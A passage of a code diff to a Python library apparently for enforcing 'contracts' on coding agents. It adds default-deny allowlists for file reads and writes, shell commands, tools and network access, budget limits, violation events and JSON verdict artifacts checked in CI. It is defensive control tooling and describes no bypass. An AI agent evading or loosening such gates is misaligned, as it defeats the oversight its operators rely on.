from.") @click.option("--name", "-n", 
"agent_name", help="Agent name override.") @click.option("--version", "-v", "agent_version", help="Agent version override.") @click.option("--output", "-o", "output_path", type=click.Path(), help="Output file path.") -def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Optional[str], - output_path: Optional[str]) -> None: +@click.option( + "--template", + type=click.Choice(["basic", "coding"], case_sensitive=False), + default="basic", + show_default=True, + help="Template to use when not generating from traces.", +) +def init( + trace_path: Optional[str], + agent_name: Optional[str], + agent_version: Optional[str], + output_path: Optional[str], + template: str, +) -> None: """Generate a contract skeleton (optionally from execution traces).""" from agent_contracts.init_from_trace import generate_contract_yaml @@ -165,26 +191,73 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op trace_path, agent_name=agent_name, agent_version=agent_version ) else: - # Generate a minimal template - template = { - "agent_contract": "0.1.0", - "identity": { - "name": agent_name or "my-agent", - "version": agent_version or "0.1.0", - "description": "TODO: Describe what this agent does.", - }, - "contract": { - "postconditions": [ - { - "name": "produces_output", - "check": "output is not None", - "enforcement": "sync_block", - "severity": "critical", + if template == "coding": + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "repo-build-agent", + "version": agent_version or "0.1.0", + "description": "Repo-local coding/build agent with fail-closed scopes.", + }, + "effects": { + "authorized": { + "filesystem": { + "read": ["src/**", "tests/**", "README.md", "pyproject.toml"], + "write": ["src/**", "tests/**", "README.md"], + }, + "shell": { + "commands": [ + "python -m pytest *", + "python -m ruff check *", + ] + }, + "tools": [], + "network": [], + "state_writes": [], } - ] - }, - } - result = 
yaml.dump(template, sort_keys=False, default_flow_style=False) + }, + "resources": { + "budgets": { + "max_tokens": 50000, + "max_tool_calls": 20, + "max_shell_commands": 10, + "max_duration_seconds": 1800, + } + }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + } + else: + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "my-agent", + "version": agent_version or "0.1.0", + "description": "TODO: Describe what this agent does.", + }, + "contract": { + "postconditions": [ + { + "name": "produces_output", + "check": "output is not None", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + } + result = yaml.dump(payload, sort_keys=False, default_flow_style=False) if output_path: Path(output_path).write_text(result, encoding="utf-8") @@ -193,10 +266,46 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op click.echo(result) +@main.command("check-verdict") +@click.argument("verdict_path", type=click.Path(exists=True)) +@click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") +@click.option("--fail-on-warn", is_flag=True, help="Return non-zero for warn outcomes.") +def check_verdict(verdict_path: str, json_output: bool, fail_on_warn: bool) -> None: + """Inspect a verdict artifact and return a CI-friendly exit code.""" + verdict = load_verdict_artifact(verdict_path) + outcome = verdict.get("outcome", "unknown") + final_gate = verdict.get("final_gate", "unknown") + should_fail = outcome in {"blocked", "fail"} or (fail_on_warn and outcome == "warn") + + if json_output: + click.echo(json.dumps(verdict, indent=2)) + else: + click.echo(f"Outcome: {outcome}") + click.echo(f"Final gate: {final_gate}") + violations = 
verdict.get("violations", []) + checks = verdict.get("checks", []) + if violations: + click.echo("\nViolations:") + for violation in violations: + click.echo(f" - {violation.get('violated_clause')}") + if checks: + click.echo("\nChecks:") + for check in checks: + click.echo(f" - {check.get('name')}: {check.get('status')}") + + if should_fail: + sys.exit(1) + + @main.command() @click.argument("contract_path", type=click.Path(exists=True)) -@click.option("--eval-suite", "-e", "eval_dir", type=click.Path(exists=True), - help="Directory containing eval test cases (JSONL).") +@click.option( + "--eval-suite", + "-e", + "eval_dir", + type=click.Path(exists=True), + help="Directory containing eval test cases (JSONL).", +) def test(contract_path: str, eval_dir: Optional[str]) -> None: """Run eval suite against contract postconditions.""" from agent_contracts.loader import ContractLoadError, load_contract @@ -204,15 +313,17 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: try: contract = load_contract(contract_path) - except ContractLoadError as e: - click.echo(f"Error loading contract: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error loading contract: {exc}", err=True) sys.exit(1) if not eval_dir: click.echo(f"Contract '{contract.identity.name}' loaded (Tier {contract.tier}).") click.echo(f"Postconditions: {len(contract.postconditions)}") - for pc in contract.postconditions: - click.echo(f" - {pc.name} ({pc.enforcement}): {pc.check}") + for postcondition in contract.postconditions: + click.echo( + f" - {postcondition.name} ({postcondition.enforcement}): {postcondition.check}" + ) click.echo("\nNo eval suite specified. 
Use --eval-suite to run tests.") return @@ -226,10 +337,10 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: passed = 0 failed = 0 - for tf in test_files: - click.echo(f"\n--- {tf.name} ---") - with open(tf, encoding="utf-8") as f: - for line_num, line in enumerate(f, 1): + for test_file in test_files: + click.echo(f"\n--- {test_file.name} ---") + with open(test_file, encoding="utf-8") as handle: + for line_num, line in enumerate(handle, 1): line = line.strip() if not line: continue @@ -238,24 +349,24 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: except json.JSONDecodeError: click.echo(f" Line {line_num}: SKIP (invalid JSON)") continue - output = case.get("output", case.get("result")) total += 1 try: - results = evaluate_postconditions( - contract.postconditions, output - ) - all_passed = all(r.passed for r in results) - if all_passed: + results = evaluate_postconditions(contract.postconditions, output) + if all(result.passed for result in results): passed += 1 click.echo(f" Case {line_num}: PASS") else: failed += 1 - failed_names = [r.postcondition.name for r in results if not r.passed] + failed_names = [ + result.postcondition.name for result in results if not result.passed + ] click.echo(f" Case {line_num}: FAIL ({', '.join(failed_names)})") - except PostconditionError as e: + except PostconditionError as exc: failed += 1 - click.echo(f" Case {line_num}: FAIL (blocked: {e.postcondition.name})") + click.echo( + f" Case {line_num}: FAIL (blocked: {exc.postcondition.name})" + ) click.echo(f"\nResults: {passed}/{total} passed, {failed} failed") if failed > 0: diff --git a/src/agent_contracts/composition.py b/src/agent_contracts/composition.py index c04d3a5..4c2ba92 100644 --- a/src/agent_contracts/composition.py +++ b/src/agent_contracts/composition.py @@ -18,24 +18,18 @@ @dataclass class SchemaGap: - """A gap between producer output and consumer input schemas.""" - field_path: str issue: str @dataclass class CapabilityGap: - """A 
tool the consumer needs but the producer doesn't authorize for delegation.""" - tool: str reason: str @dataclass class BudgetGap: - """A budget field where the consumer exceeds what the producer allows.""" - budget_type: str producer_limit: Optional[float] consumer_limit: Optional[float] @@ -44,8 +38,6 @@ class BudgetGap: @dataclass class CompatibilityReport: - """Full compatibility report between two contracts.""" - compatible: bool producer: str consumer: str @@ -56,7 +48,6 @@ class CompatibilityReport: warnings: List[str] = field(default_factory=list) def summary(self) -> str: - """One-line summary of compatibility.""" if self.compatible: warnings = f" ({len(self.warnings)} warnings)" if self.warnings else "" return f"Compatible: {self.producer} -> {self.consumer}{warnings}" @@ -73,21 +64,18 @@ def _check_schema_compatibility( producer_output: Optional[Dict[str, Any]], consumer_input: Optional[Dict[str, Any]], ) -> List[SchemaGap]: - """Check if producer output schema is assignable to consumer input schema. - - This is a structural compatibility check, not full JSON Schema subtyping. - Checks that required consumer input fields exist in producer output. 
- """ gaps: List[SchemaGap] = [] if consumer_input is None: - return gaps # Consumer accepts anything + return gaps if producer_output is None: - gaps.append(SchemaGap( - field_path="(root)", - issue="Consumer expects structured input but producer has no output schema.", - )) + gaps.append( + SchemaGap( + field_path="(root)", + issue="Consumer expects structured input but producer has no output schema.", + ) + ) return gaps consumer_required = consumer_input.get("required", []) @@ -95,60 +83,69 @@ def _check_schema_compatibility( for req_field in consumer_required: if req_field not in producer_props: - gaps.append(SchemaGap( - field_path=req_field, - issue=f"Consumer requires field '{req_field}' but producer output schema doesn't define it.", - )) + gaps.append( + SchemaGap( + field_path=req_field, + issue=( + f"Consumer requires field '{req_field}' but producer output schema " + "doesn't define it." + ), + ) + ) - # Check type compatibility for shared fields consumer_props = consumer_input.get("properties", {}) for field_name, consumer_field in consumer_props.items(): if field_name in producer_props: producer_type = producer_props[field_name].get("type") consumer_type = consumer_field.get("type") if producer_type and consumer_type and producer_type != consumer_type: - gaps.append(SchemaGap( - field_path=field_name, - issue=f"Type mismatch: producer outputs '{producer_type}' but consumer expects '{consumer_type}'.", - )) + gaps.append( + SchemaGap( + field_path=field_name, + issue=( + f"Type mismatch: producer outputs '{producer_type}' " + f"but consumer expects '{consumer_type}'." 
+ ), + ) + ) return gaps -def _check_capability_compatibility( - producer: Contract, consumer: Contract -) -> List[CapabilityGap]: - """Check if the consumer's tool needs are covered by the producer's delegation.""" +def _check_capability_compatibility(producer: Contract, consumer: Contract) -> List[CapabilityGap]: gaps: List[CapabilityGap] = [] if consumer.effects_authorized is None: return gaps - # If producer has delegation rules, check allowed agents if producer.delegation and producer.delegation.allowed_agents is not None: if consumer.identity.name not in producer.delegation.allowed_agents: - gaps.append(CapabilityGap( - tool="(delegation)", - reason=f"Consumer '{consumer.identity.name}' not in producer's allowed_agents list.", - )) + gaps.append( + CapabilityGap( + tool="(delegation)", + reason=( + f"Consumer '{consumer.identity.name}' not in producer's " + "allowed_agents list." + ), + ) + ) - # If producer has authorized effects and attenuates during delegation, - # check that consumer's needed tools are within producer's scope if producer.effects_authorized and consumer.effects_authorized: for tool in consumer.effects_authorized.tools: if not matches_any(tool, producer.effects_authorized.tools): - gaps.append(CapabilityGap( - tool=tool, - reason=f"Consumer needs tool '{tool}' but producer doesn't authorize it.", - )) + gaps.append( + CapabilityGap( + tool=tool, + reason=( + f"Consumer needs tool '{tool}' but producer doesn't authorize it." 
+ ), + ) + ) return gaps -def _check_budget_compatibility( - producer: Contract, consumer: Contract -) -> List[BudgetGap]: - """Check if consumer budget fits within producer budget.""" +def _check_budget_compatibility(producer: Contract, consumer: Contract) -> List[BudgetGap]: gaps: List[BudgetGap] = [] if producer.budgets is None or consumer.budgets is None: @@ -158,41 +155,50 @@ def _check_budget_compatibility( ("max_cost_usd", producer.budgets.max_cost_usd, consumer.budgets.max_cost_usd), ("max_tokens", producer.budgets.max_tokens, consumer.budgets.max_tokens), ("max_tool_calls", producer.budgets.max_tool_calls, consumer.budgets.max_tool_calls), - ("max_duration_seconds", producer.budgets.max_duration_seconds, consumer.budgets.max_duration_seconds), + ( + "max_duration_seconds", + producer.budgets.max_duration_seconds, + consumer.budgets.max_duration_seconds, + ), + ( + "max_shell_commands", + producer.budgets.max_shell_commands, + consumer.budgets.max_shell_commands, + ), ] for budget_type, prod_limit, cons_limit in checks: if prod_limit is not None and cons_limit is not None: if cons_limit > prod_limit: - gaps.append(BudgetGap( + gaps.append( + BudgetGap( + budget_type=budget_type, + producer_limit=float(prod_limit), + consumer_limit=float(cons_limit), + issue=( + f"Consumer {budget_type}={cons_limit} exceeds producer " + f"limit={prod_limit}." 
+ ), + ) + ) + elif prod_limit is not None and cons_limit is None: + gaps.append( + BudgetGap( budget_type=budget_type, producer_limit=float(prod_limit), - consumer_limit=float(cons_limit), - issue=f"Consumer {budget_type}={cons_limit} exceeds producer limit={prod_limit}.", - )) - elif prod_limit is not None and cons_limit is None: - gaps.append(BudgetGap( - budget_type=budget_type, - producer_limit=float(prod_limit), - consumer_limit=None, - issue=f"Producer limits {budget_type}={prod_limit} but consumer has no limit.", - )) + consumer_limit=None, + issue=( + f"Producer limits {budget_type}={prod_limit} but consumer has no limit." + ), + ) + ) return gaps def check_compatibility(producer: Contract, consumer: Contract) -> CompatibilityReport: - """Compute the Contract Differential between a producer and consumer. - - Checks schema assignability, capability coverage, budget fit, - and effect authorization compliance. - """ - schema_gaps = _check_schema_compatibility( - producer.output_schema, consumer.input_schema - ) - + schema_gaps = _check_schema_compatibility(producer.output_schema, consumer.input_schema) capability_gaps = _check_capability_compatibility(producer, consumer) - budget_gaps = _check_budget_compatibility(producer, consumer) effect_violations: List[str] = [] @@ -203,9 +209,13 @@ def check_compatibility(producer: Contract, consumer: Contract) -> Compatibility warnings: List[str] = [] if producer.tier < 2: - warnings.append(f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition." + ) if consumer.tier < 2: - warnings.append(f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition." 
+ ) compatible = ( len(schema_gaps) == 0 diff --git a/src/agent_contracts/effects.py b/src/agent_contracts/effects.py index 557561d..a207faf 100644 --- a/src/agent_contracts/effects.py +++ b/src/agent_contracts/effects.py @@ -1,4 +1,4 @@ -"""Effect authorization — default-deny tool gating with glob pattern matching. +"""Effect authorization for coding/build agents. Authorized effects compose via intersection during delegation. Declared effects compose via union for auditing. @@ -8,64 +8,111 @@ from __future__ import annotations import fnmatch -from typing import List, Optional, Set +from pathlib import Path +from typing import List, Optional, Sequence, Set -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) class EffectDeniedError(Exception): """Raised when a tool call or effect is not authorized.""" - def __init__(self, effect_type: str, name: str, allowed: List[str]) -> None: + def __init__(self, effect_type: str, name: str, allowed: Sequence[str]) -> None: self.effect_type = effect_type self.name = name - self.allowed = allowed + self.allowed = list(allowed) super().__init__( f"{effect_type} '{name}' denied. " - f"Authorized: {allowed if allowed else '(none — default deny)'}" + f"Authorized: {list(allowed) if allowed else '(none — default deny)'}" ) -def matches_any(name: str, patterns: List[str]) -> bool: +def matches_any(name: str, patterns: Sequence[str]) -> bool: """Check if a name matches any of the given glob patterns.""" return any(fnmatch.fnmatch(name, pattern) for pattern in patterns) -class EffectGuard: - """Enforces the effects.authorized allowlist (default-deny). 
+def _intersect_lists(parent_list: Sequence[str], child_list: Sequence[str]) -> List[str]: + result: List[str] = [] + for child_pattern in child_list: + if matches_any(child_pattern, parent_list) or any( + fnmatch.fnmatch(parent_pattern, child_pattern) for parent_pattern in parent_list + ): + result.append(child_pattern) + return result - All checks are O(n) where n = number of patterns. For production - workloads with large allowlists, consider pre-compiling patterns. - """ - def __init__(self, authorized: Optional[EffectsAuthorized] = None) -> None: +class EffectGuard: + """Enforces the effects.authorized allowlist (default-deny when configured).""" + + def __init__( + self, + authorized: Optional[EffectsAuthorized] = None, + *, + repo_root: Optional[Path] = None, + ) -> None: self._authorized = authorized + self._repo_root = repo_root.resolve() if repo_root is not None else Path.cwd().resolve() @property def is_configured(self) -> bool: - """Whether effect authorization is configured.""" + """Whether effect authorization was configured on the contract.""" return self._authorized is not None + def _path_candidates(self, path: str) -> List[str]: + raw = Path(path) + absolute = raw if raw.is_absolute() else (self._repo_root / raw) + absolute = absolute.resolve() + candidates: List[str] = [path, absolute.as_posix()] + try: + candidates.append(absolute.relative_to(self._repo_root).as_posix()) + except ValueError: + pass + return list(dict.fromkeys(candidates)) + + def _filesystem_matches(self, path: str, patterns: Sequence[str]) -> bool: + return any(matches_any(candidate, patterns) for candidate in self._path_candidates(path)) + + def _normalized_command(self, command: str) -> str: + return " ".join(command.strip().split()) + def check_tool(self, tool_name: str) -> bool: - """Check if a tool call is authorized. 
Returns True if allowed.""" if self._authorized is None: - return True # No authorization configured = allow all + return True return matches_any(tool_name, self._authorized.tools) def check_network(self, url: str) -> bool: - """Check if a network request is authorized.""" if self._authorized is None: return True return matches_any(url, self._authorized.network) def check_state_write(self, scope: str) -> bool: - """Check if a state write is authorized.""" if self._authorized is None: return True return matches_any(scope, self._authorized.state_writes) + def check_file_read(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.read) + + def check_file_write(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.write) + + def check_shell_command(self, command: str) -> bool: + if self._authorized is None or self._authorized.shell is None: + return True + normalized = self._normalized_command(command) + return matches_any(normalized, self._authorized.shell.commands) + def require_tool(self, tool_name: str) -> None: - """Assert a tool call is authorized; raise EffectDeniedError if not.""" if not self.check_tool(tool_name): raise EffectDeniedError( "tool", @@ -74,7 +121,6 @@ def require_tool(self, tool_name: str) -> None: ) def require_network(self, url: str) -> None: - """Assert a network request is authorized.""" if not self.check_network(url): raise EffectDeniedError( "network", @@ -83,7 +129,6 @@ def require_network(self, url: str) -> None: ) def require_state_write(self, scope: str) -> None: - """Assert a state write is authorized.""" if not self.check_state_write(scope): raise EffectDeniedError( "state_write", @@ -91,30 +136,52 @@ def require_state_write(self, scope: str) -> None: self._authorized.state_writes if 
self._authorized else [], ) + def require_file_read(self, path: str) -> None: + if not self.check_file_read(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.read + raise EffectDeniedError("filesystem.read", path, allowed) + + def require_file_write(self, path: str) -> None: + if not self.check_file_write(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.write + raise EffectDeniedError("filesystem.write", path, allowed) + + def require_shell_command(self, command: str) -> None: + if not self.check_shell_command(command): + allowed = [] + if self._authorized is not None and self._authorized.shell is not None: + allowed = self._authorized.shell.commands + raise EffectDeniedError("shell.command", self._normalized_command(command), allowed) + + +def intersect_authorized(parent: EffectsAuthorized, child: EffectsAuthorized) -> EffectsAuthorized: + """Compute intersection of authorized effects (capability attenuation for delegation).""" + + filesystem: Optional[FilesystemAuthorization] = None + if parent.filesystem is not None or child.filesystem is not None: + parent_fs = parent.filesystem or FilesystemAuthorization() + child_fs = child.filesystem or FilesystemAuthorization() + filesystem = FilesystemAuthorization( + read=_intersect_lists(parent_fs.read, child_fs.read), + write=_intersect_lists(parent_fs.write, child_fs.write), + ) -def intersect_authorized( - parent: EffectsAuthorized, child: EffectsAuthorized -) -> EffectsAuthorized: - """Compute intersection of authorized effects (capability attenuation for delegation). - - The child can only use effects that BOTH parent and child authorize. - Uses glob matching: a child pattern is kept only if it matches at least - one parent pattern, or vice versa. 
- """ - - def _intersect_lists(parent_list: List[str], child_list: List[str]) -> List[str]: - result: List[str] = [] - for c in child_list: - if matches_any(c, parent_list) or any( - fnmatch.fnmatch(p, c) for p in parent_list - ): - result.append(c) - return result + shell: Optional[ShellAuthorization] = None + if parent.shell is not None or child.shell is not None: + parent_shell = parent.shell or ShellAuthorization() + child_shell = child.shell or ShellAuthorization() + shell = ShellAuthorization(commands=_intersect_lists(parent_shell.commands, child_shell.commands)) return EffectsAuthorized( tools=_intersect_lists(parent.tools, child.tools), network=_intersect_lists(parent.network, child.network), state_writes=_intersect_lists(parent.state_writes, child.state_writes), + filesystem=filesystem, + shell=shell, ) @@ -140,10 +207,7 @@ def _union_unique(x: List[str], y: List[str]) -> List[str]: def validate_declared_subset( declared: EffectsDeclared, authorized: EffectsAuthorized ) -> List[str]: - """Validate that declared effects are a subset of authorized effects. - - Returns a list of violation messages. Empty = valid. - """ + """Validate that declared effects are a subset of authorized effects.""" violations: List[str] = [] for tool in declared.tools: if not matches_any(tool, authorized.tools): diff --git a/src/agent_contracts/enforcer.py b/src/agent_contracts/enforcer.py index 941dbc3..0a73daf 100644 --- a/src/agent_contracts/enforcer.py +++ b/src/agent_contracts/enforcer.py @@ -1,26 +1,24 @@ -"""Runtime enforcement middleware — the unified enforcement layer. -Wires together effects, budgets, postconditions, and violations into a -single enforcement flow. Supports three usage patterns: - -1. Decorator: @enforce_contract("path/to/contract.yaml") -2. Context manager: with ContractEnforcer(contract) as enforcer: ... -3. 
Explicit API: enforcer.check_tool_call(name, args) -""" +"""Runtime enforcement middleware for repo-local coding-agent contracts.""" from __future__ import annotations import functools import inspect +import json +import uuid +from dataclasses import dataclass, field +from datetime import datetime, timezone from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, TypeVar, Union +from typing import Any, Callable, Dict, List, Literal, Optional, TypeVar, Union, cast import jsonschema -from agent_contracts.budgets import BudgetExceededError, BudgetTracker +from agent_contracts.budgets import BudgetExceededError, BudgetSnapshot, BudgetTracker from agent_contracts.effects import EffectGuard from agent_contracts.loader import load_contract from agent_contracts.postconditions import ( + PostconditionError, PostconditionResult, PreconditionError, PreconditionResult, @@ -31,6 +29,79 @@ from agent_contracts.violations import ViolationEmitter, ViolationEvent F = TypeVar("F", bound=Callable[..., Any]) +CheckStatus = Literal["pass", "warn", "fail", "blocked", "skipped"] + + +@dataclass(frozen=True) +class RunCheckResult: + """Result for a named repo check or final gate check.""" + + name: str + status: CheckStatus + required: bool = True + exit_code: Optional[int] = None + detail: Optional[str] = None + evidence: Dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> Dict[str, Any]: + data: Dict[str, Any] = { + "name": self.name, + "status": self.status, + "required": self.required, + } + if self.exit_code is not None: + data["exit_code"] = self.exit_code + if self.detail is not None: + data["detail"] = self.detail + if self.evidence: + data["evidence"] = self.evidence + return data + + def to_context(self) -> Dict[str, Any]: + return { + "status": self.status, + "required": self.required, + "exit_code": self.exit_code, + "detail": self.detail, + } + + +@dataclass(frozen=True) +class RunVerdict: + """Durable verdict artifact for a 
contract-governed run.""" + + run_id: str + contract: Dict[str, Any] + host: Dict[str, Any] + outcome: Literal["pass", "warn", "blocked", "fail"] + final_gate: Literal["allowed", "blocked", "failed"] + violations: List[Dict[str, Any]] + checks: List[RunCheckResult] + budgets: Dict[str, Any] + artifacts: Dict[str, Any] + timestamp: str + warnings: List[str] = field(default_factory=list) + + def to_dict(self) -> Dict[str, Any]: + return { + "run_id": self.run_id, + "contract": self.contract, + "host": self.host, + "outcome": self.outcome, + "final_gate": self.final_gate, + "violations": self.violations, + "checks": [check.to_dict() for check in self.checks], + "budgets": self.budgets, + "artifacts": self.artifacts, + "timestamp": self.timestamp, + "warnings": self.warnings, + } + + def write_json(self, destination: Union[str, Path]) -> Path: + path = Path(destination) + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(json.dumps(self.to_dict(), indent=2, sort_keys=True), encoding="utf-8") + return path class ContractViolation(Exception): @@ -41,12 +112,13 @@ def __init__(self, message: str, event: Optional[ViolationEvent] = None) -> None self.event = event -class ContractEnforcer: - """Unified runtime enforcement for an agent contract. +def load_verdict_artifact(source: Union[str, Path]) -> Dict[str, Any]: + """Load a JSON verdict artifact from disk.""" + return cast(Dict[str, Any], json.loads(Path(source).read_text(encoding="utf-8"))) - Enforces effects (default-deny), budgets (circuit breaker), - input/output schema validation, and postconditions. 
- """ + +class ContractEnforcer: + """Unified runtime enforcement for an agent contract.""" def __init__( self, @@ -55,14 +127,37 @@ def __init__( violation_destination: str = "stdout", violation_callback: Optional[Callable[[ViolationEvent], None]] = None, cost_callback: Optional[Callable[[], float]] = None, + repo_root: Optional[Union[str, Path]] = None, + host_name: str = "unknown", + host_version: Optional[str] = None, + run_id: Optional[str] = None, ) -> None: self._contract = contract - self._effect_guard = EffectGuard(contract.effects_authorized) + self._repo_root = self._resolve_repo_root(repo_root) + self._effect_guard = EffectGuard(contract.effects_authorized, repo_root=self._repo_root) self._budget_tracker = BudgetTracker(contract.budgets, cost_callback=cost_callback) self._emitter = ViolationEmitter( destination=violation_destination, callback=violation_callback ) self._warnings: List[str] = [] + self._checks: Dict[str, RunCheckResult] = {} + self._run_id = run_id or str(uuid.uuid4()) + self._host_name = host_name + self._host_version = host_version + self._blocked = False + self._postcondition_failure: Optional[PostconditionError] = None + self._postconditions_evaluated = False + self._last_output: Any = None + self._last_extra_context: Optional[Dict[str, Any]] = None + self._finalized_verdict: Optional[RunVerdict] = None + self._artifact_path: Optional[Path] = None + + def _resolve_repo_root(self, repo_root: Optional[Union[str, Path]]) -> Path: + if repo_root is not None: + return Path(repo_root).resolve() + if self._contract.source_path is not None: + return Path(self._contract.source_path).resolve().parent + return Path.cwd().resolve() @property def contract(self) -> Contract: @@ -80,183 +175,441 @@ def violations(self) -> List[ViolationEvent]: def warnings(self) -> List[str]: return list(self._warnings) - # --- Precondition evaluation --- + @property + def checks(self) -> List[RunCheckResult]: + return list(self._checks.values()) - def 
check_preconditions(self, input_data: Any) -> List[PreconditionResult]: - """Evaluate preconditions against input data before agent runs. + @property + def run_id(self) -> str: + return self._run_id + + @property + def artifact_path(self) -> Optional[Path]: + return self._artifact_path - Raises ContractViolation if any precondition fails. - Returns empty list if no preconditions are defined. - """ + @property + def finalized_verdict(self) -> Optional[RunVerdict]: + return self._finalized_verdict + + def _check_context(self) -> Dict[str, Dict[str, Any]]: + return {name: result.to_context() for name, result in self._checks.items()} + + def _record_blocked_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + message: str, + severity: str = "critical", + ) -> None: + self._blocked = True + event = self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="blocked", + ) + raise ContractViolation(message, event=event) + + def _record_failed_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "critical", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="failed", + ) + + def _record_warn_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "major", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="warned", + ) + + def check_preconditions(self, input_data: Any) -> List[PreconditionResult]: if not self._contract.preconditions: return [] try: return evaluate_preconditions( self._contract.preconditions, input_data, 
raise_on_failure=True ) - except PreconditionError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"inputs.preconditions.{e.precondition.name}", - evidence={"check": e.precondition.check}, - severity="critical", - enforcement="blocked", + except PreconditionError as exc: + self._record_blocked_event( + clause=f"inputs.preconditions.{exc.precondition.name}", + evidence={"check": exc.precondition.check}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Input validation --- + raise AssertionError("unreachable") def validate_input(self, input_data: Any) -> List[str]: - """Validate input against the contract's input schema. - - Returns list of validation errors. Raises ContractViolation - if schema validation fails and enforcement is sync_block. - """ if self._contract.input_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.input_schema) errors = [e.message for e in validator.iter_errors(input_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="inputs.schema", - evidence={"errors": errors, "input_keys": list(input_data.keys()) if isinstance(input_data, dict) else str(type(input_data))}, - severity="major", - enforcement="blocked", + self._record_warn_event( + clause="inputs.schema", + evidence={ + "errors": errors, + "input_type": type(input_data).__name__, + }, ) return errors - # --- Tool call interception --- - def check_tool_call(self, tool_name: str, args: Optional[Dict[str, Any]] = None) -> None: - """Check if a tool call is authorized and within budget. - - Raises ContractViolation if the tool is denied or budget exceeded. 
- """ - # Effect check + del args if not self._effect_guard.check_tool(tool_name): - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="effects.authorized.tools", - evidence={"tool": tool_name, "authorized": self._contract.effects_authorized.tools if self._contract.effects_authorized else []}, - severity="critical", - enforcement="blocked", + self._record_blocked_event( + clause="effects.authorized.tools", + evidence={ + "tool": tool_name, + "authorized": self._contract.effects_authorized.tools + if self._contract.effects_authorized + else [], + }, + message=f"Tool '{tool_name}' not authorized by contract.", + ) + try: + self._budget_tracker.record_tool_call() + except BudgetExceededError as exc: + self._record_blocked_event( + clause=f"resources.budgets.max_{exc.budget_type}" + if exc.budget_type == "tool_calls" + else f"resources.budgets.{exc.budget_type}", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation( - f"Tool '{tool_name}' not authorized by contract.", event=event + + def check_network_request(self, url: str) -> None: + if not self._effect_guard.check_network(url): + self._record_blocked_event( + clause="effects.authorized.network", + evidence={ + "url": url, + "authorized": self._contract.effects_authorized.network + if self._contract.effects_authorized + else [], + }, + message=f"Network request '{url}' not authorized by contract.", + ) + + def check_state_write(self, scope: str) -> None: + if not self._effect_guard.check_state_write(scope): + self._record_blocked_event( + clause="effects.authorized.state_writes", + evidence={ + "scope": scope, + "authorized": self._contract.effects_authorized.state_writes + if self._contract.effects_authorized + else [], + }, + message=f"State write '{scope}' not authorized by contract.", + ) + + def check_file_read(self, path: Union[str, Path]) -> None: + candidate = 
str(path) + if not self._effect_guard.check_file_read(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.read + self._record_blocked_event( + clause="effects.authorized.filesystem.read", + evidence={"path": candidate, "authorized": patterns}, + message=f"File read '{candidate}' not authorized by contract.", + ) + + def check_file_write(self, path: Union[str, Path]) -> None: + candidate = str(path) + if not self._effect_guard.check_file_write(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.write + self._record_blocked_event( + clause="effects.authorized.filesystem.write", + evidence={"path": candidate, "authorized": patterns}, + message=f"File write '{candidate}' not authorized by contract.", ) - # Budget check — record the tool call + def check_shell_command(self, command: str) -> None: + if not self._effect_guard.check_shell_command(command): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.shell is not None + ): + patterns = self._contract.effects_authorized.shell.commands + self._record_blocked_event( + clause="effects.authorized.shell.commands", + evidence={"command": command, "authorized": patterns}, + message=f"Shell command '{command}' not authorized by contract.", + ) try: - self._budget_tracker.record_tool_call() - except 